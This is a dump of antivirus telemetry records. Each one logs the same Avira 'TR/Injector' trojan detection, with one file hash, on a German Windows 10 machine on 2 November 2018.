  Row(detection=Row(filename='avscan-20181102-053620-32e78a3f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053620-32E78A3F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055043-34e1435d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055043-34E1435D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062540-16bd3f96', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062540-16BD3F96', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055357-a8ab737e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055357-A8AB737E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061741-f95a5b31', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061741-F95A5B31', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060859-c253cecb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060859-C253CECB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055044-3551feaf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055044-3551FEAF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055314-8f18074f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055314-8F18074F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061846-200ba932', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061846-200BA932', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053654-46c9aa96', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053654-46C9AA96', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055009-20e4bc6c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055009-20E4BC6C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062556-206a3d2b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062556-206A3D2B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061715-e9b9c55d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061715-E9B9C55D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051634-6fde3aaf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051634-6FDE3AAF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055355-a742505f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055355-A742505F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051609-60a75ad5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051609-60A75AD5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051656-7ce3a77c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051656-7CE3A77C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055009-20ecfc3b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055009-20ECFC3B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060847-bafef21c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060847-BAFEF21C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061800-04e5a0a6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061800-04E5A0A6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055101-3f81a146', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055101-3F81A146', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053635-3b83792f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053635-3B83792F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055307-8ac9318a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055307-8AC9318A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055101-3f79b2d3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055101-3F79B2D3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051634-6fcaaacf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051634-6FCAAACF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055100-3f3637df', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055100-3F3637DF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061801-05128bcb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061801-05128BCB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060842-b82a4f6b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060842-B82A4F6B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062521-0ba55da0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062521-0BA55DA0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061846-2050f8b9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061846-2050F8B9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061840-1cd9dd6c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061840-1CD9DD6C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051628-6c3453fe', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051628-6C3453FE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061753-00cd05dd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061753-00CD05DD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062520-0b23a5e3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062520-0B23A5E3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061734-f53917a3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061734-F53917A3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055326-960d5612', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055326-960D5612', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055324-9508b0b6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055324-9508B0B6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053609-2c38213e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053609-2C38213E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061728-f1a95386', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061728-F1A95386', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053609-2c293616', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053609-2C293616', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053610-2c6c3983', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053610-2C6C3983', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060901-c354cc9a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060901-C354CC9A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051639-72c3f1da', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051639-72C3F1DA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053616-305c5ed4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053616-305C5ED4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061613-c4c733ac', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061613-C4C733AC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:16:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053616-301a7afc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053616-301A7AFC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061853-24697616', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061853-24697616', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060804-a1650374', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060804-A1650374', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053630-3855ffc1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053630-3855FFC1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061835-19dd2a2c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061835-19DD2A2C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055324-952cb318', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055324-952CB318', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061759-044835ab', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061759-044835AB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055034-2f8ef781', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055034-2F8EF781', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060859-c220e6f7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060859-C220E6F7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053643-4099a5c4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053643-4099A5C4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:42Z'), dt=datetime.date(2018, 11, 2)),
